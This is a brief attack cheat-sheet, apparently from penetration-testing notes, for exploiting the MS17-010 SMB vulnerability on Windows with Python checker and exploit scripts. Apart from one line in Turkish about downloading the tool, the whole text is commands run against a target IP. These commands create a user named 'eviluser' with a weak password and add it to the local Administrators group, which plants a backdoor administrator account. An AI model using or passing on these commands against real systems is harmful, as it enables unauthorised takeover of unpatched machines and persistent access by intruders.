ms17-010 python exploit

ms17-010 aracını indir.

check

# python zzz_checker.py -t IP

add user

# python zzz_exploit.py -t IP -c 'net user eviluser Password1 /add'

add user to localgroup

# python zzz_exploit.py -t IP -c 'net localgroup Administrators eviluser /add'

Last updated